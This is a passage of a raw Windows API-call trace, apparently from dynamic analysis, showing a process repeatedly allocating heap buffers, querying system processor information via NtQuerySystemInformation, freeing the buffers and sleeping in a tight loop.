hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0244.581] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b808 [0244.581] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b808, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b808, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.582] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b808 | out: hHeap=0x2560000) returned 1 [0244.582] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0244.582] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0244.583] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0244.583] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0244.584] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0244.584] Sleep (dwMilliseconds=0x110) [0244.592] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0244.592] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.593] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0244.593] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285abc0 [0244.593] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285abc0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285abc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.593] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285abc0 | out: hHeap=0x2560000) returned 1 [0244.593] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c3e8 [0244.593] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c3e8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c3e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.594] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c3e8 | out: hHeap=0x2560000) returned 1 [0244.594] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d3f0 [0244.594] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d3f0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d3f0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0244.595] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d3f0 | out: hHeap=0x2560000) returned 1 [0244.595] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0244.596] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0244.596] Sleep (dwMilliseconds=0x110) [0244.607] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0244.607] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.608] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0244.608] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0244.608] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.609] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0244.609] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0244.609] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.609] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0244.609] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c5e0 [0244.609] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c5e0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c5e0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0244.610] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c5e0 | out: hHeap=0x2560000) returned 1 [0244.610] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0244.611] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0244.611] Sleep (dwMilliseconds=0x110) [0244.626] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0244.626] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.627] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0244.627] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0244.627] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.627] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0244.627] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c3e8 [0244.627] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c3e8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c3e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.628] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c3e8 | out: hHeap=0x2560000) returned 1 [0244.628] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0244.628] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0244.629] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0244.629] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0244.630] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0244.630] Sleep (dwMilliseconds=0x110) [0244.641] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0244.642] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.646] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0244.646] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0244.646] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.646] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0244.646] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0244.646] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.647] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0244.647] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0244.647] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0244.647] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0244.647] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0244.648] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0244.648] Sleep (dwMilliseconds=0x110) [0244.653] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0244.653] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.654] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0244.654] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0244.654] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.654] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0244.654] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0244.654] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.655] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0244.655] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0244.655] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0244.655] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0244.655] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0244.656] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0244.656] Sleep (dwMilliseconds=0x110) [0244.673] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0244.673] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.673] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0244.673] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0244.673] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.674] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0244.674] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0244.674] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.674] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0244.674] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0244.674] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0244.675] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0244.675] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0244.676] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0244.676] Sleep (dwMilliseconds=0x110) [0244.689] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0244.689] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.689] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0244.689] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0244.689] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.690] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0244.690] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0244.690] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.690] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0244.690] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0244.690] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0244.690] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0244.690] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0244.691] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0244.691] Sleep (dwMilliseconds=0x110) [0244.700] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0244.703] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.703] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0244.703] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0244.704] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.704] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0244.704] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0244.704] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.704] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0244.704] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c838 [0244.704] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c838, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c838, ResultLength=0x19ee88*=0xc0) returned 0x0 [0244.705] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c838 | out: hHeap=0x2560000) returned 1 [0244.705] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0244.705] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0244.705] Sleep (dwMilliseconds=0x110) [0244.716] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0244.716] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.717] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0244.717] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0244.717] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.717] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0244.717] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0244.717] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.718] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0244.718] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0244.718] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0244.718] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0244.718] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0244.718] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0244.718] Sleep (dwMilliseconds=0x110) [0244.731] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0244.731] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.732] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0244.732] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0244.732] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.732] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0244.735] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0244.735] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.736] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0244.736] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0244.736] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0244.736] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0244.736] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0244.736] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0244.736] Sleep (dwMilliseconds=0x110) [0244.748] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0244.748] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.748] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0244.748] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0244.748] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.749] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0244.749] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0244.749] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.750] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0244.750] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c9c8 [0244.750] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c9c8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c9c8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0244.751] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c9c8 | out: hHeap=0x2560000) returned 1 [0244.751] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0244.752] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0244.752] Sleep (dwMilliseconds=0x110) [0244.763] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0244.764] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.766] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0244.766] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a610 [0244.766] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a610, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a610, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.767] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a610 | out: hHeap=0x2560000) returned 1 [0244.771] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0244.771] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.772] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0244.772] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0244.772] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0244.772] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0244.772] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0244.773] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0244.773] Sleep (dwMilliseconds=0x110) [0244.780] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0244.780] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.781] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0244.781] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0244.781] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.782] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0244.782] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0244.782] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.782] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0244.782] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0244.782] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0244.783] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0244.783] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0244.784] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0244.784] Sleep (dwMilliseconds=0x110) [0244.795] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0244.795] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.795] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0244.796] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0244.796] 